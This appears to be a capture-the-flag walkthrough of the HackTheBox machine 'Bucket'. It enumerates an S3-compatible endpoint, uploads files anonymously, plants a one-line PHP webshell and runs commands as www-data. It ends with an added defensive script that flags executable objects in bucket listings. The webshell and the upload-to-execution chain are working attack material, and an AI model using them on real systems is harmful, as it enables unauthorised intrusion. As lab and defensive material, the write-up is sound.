3 :80 s3.bucket.htb

http://s3.bucket.htb/ | http://s3.bucket.htb/adserver/
{"status": "running"}

http://s3.bucket.htb/adserver/index.html
Returns same page as http://bucket.htb/

$ gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/health               (Status: 200) [Size: 54]
/shell                (Status: 200) [Size: 0]
/shell.php            (Status: 500) [Size: 158]
/shell.html           (Status: 500) [Size: 158]
/shell.txt            (Status: 500) [Size: 158]

http://s3.bucket.htb/health
{
  "services": {
    "s3": "running",
    "dynamodb": "running"
  }
}

http://s3.bucket.htb/shell/
DynamoDB JavaScript Shell

$ sudo apt install awscli
Using https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html

$ aws s3 --endpoint-url http://s3.bucket.htb ls
2021-11-12 16:05:03 adserve

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
                           PRE images/
2021-11-12 16:09:04       5344 index.html

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/images/
2021-11-12 16:09:04      37840 bug.jpg
2021-11-12 16:09:04      51485 cloud.png
2021-11-12 16:09:04      16486 malware.png

# nothing useful here; trying to write data to S3
$ echo "kashz" > kashz.txt

$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.txt s3://adserver/kashz.txt
upload: ./kashz.txt to s3://adserver/kashz.txt

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/
                           PRE images/
2021-11-12 16:09:04       5344 index.html
2021-11-12 16:10:26          6 kashz.txt

# text file is uploaded but not visible at http://bucket.htb/kashz.txt
# testing with .html

$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.html s3://adserver/kashz.html
upload: ./kashz.html to s3://adserver/kashz.html

$ curl http://bucket.htb/kashz.html
kashz

# wolf's web.php didn't work, but a simple webshell works

$ cat k.php
<?php echo system($_GET["cmd"]); ?>

$ aws s3 --endpoint-url http://s3.bucket.htb cp k.php s3://adserver/
upload: ./k.php to s3://adserver/k.php

# for some reason, this response was coming back
$ curl http://bucket.htb/k.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at bucket.htb Port 80</address>
</body></html>

$ curl http://bucket.htb/k.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# shell gets deleted; downloading msfvenom shell, chmod 777 and executing.

$ curl http://bucket.htb/k.php -G --data-urlencode "cmd=whoami;id;hostname;uname -a"
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
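
Defender-side check for what the steps above show (objects written to the bucket end up served and executed by Apache/PHP on bucket.htb), as an added example that is not part of the original notes: it audits `aws s3 ls` output for objects a web server would hand to an interpreter. The extension lists, function names and the sample listing are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit an `aws s3 ls` listing for objects that do not belong
# in a bucket backing a static web root.

# Extensions a static content bucket is expected to hold (assumption).
STATIC_EXT_RE='^(html|htm|css|js|png|jpg|jpeg|gif|svg|ico|txt)$'
# Extensions that Apache/PHP-style setups commonly pass to an interpreter (assumption).
EXEC_EXT_RE='^(php|php[0-9]|phtml|phar|cgi|pl|py|sh)$'

# Reads `aws s3 ls` lines on stdin; prints "<VERDICT> <key>" for each non-static object.
audit_listing() {
  awk -v static_re="$STATIC_EXT_RE" -v exec_re="$EXEC_EXT_RE" '
    $1 == "PRE" { next }   # prefix ("directory") rows carry no object
    NF < 4      { next }   # blank or malformed rows
    {
      # Key = everything after date, time and size; keys may contain spaces.
      key = $0
      sub(/^ *[^ ]+ +[^ ]+ +[0-9]+ /, "", key)
      n = split(key, parts, ".")
      ext = (n > 1) ? tolower(parts[n]) : ""
      if (ext ~ exec_re)         print "EXECUTABLE " key
      else if (ext !~ static_re) print "UNEXPECTED " key
    }'
}

# Constructed sample listing in the same format as the output above.
sample_listing() {
  cat <<'EOF'
                           PRE images/
2021-11-12 16:09:04       5344 index.html
2021-11-12 16:10:26          6 notes.txt
2021-11-12 16:12:41         36 k.php
2021-11-12 16:13:02       1024 upload archive.PHTML
2021-11-12 16:13:30        207 backup.tar
EOF
}

# Against a real bucket the input would come from, for example:
#   aws s3 --endpoint-url <endpoint> ls s3://<bucket>/ --recursive | audit_listing
sample_listing | audit_listing
```

Run on a schedule or before any job that copies bucket contents into a web root; any EXECUTABLE line means the bucket accepted a file the web server may run.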
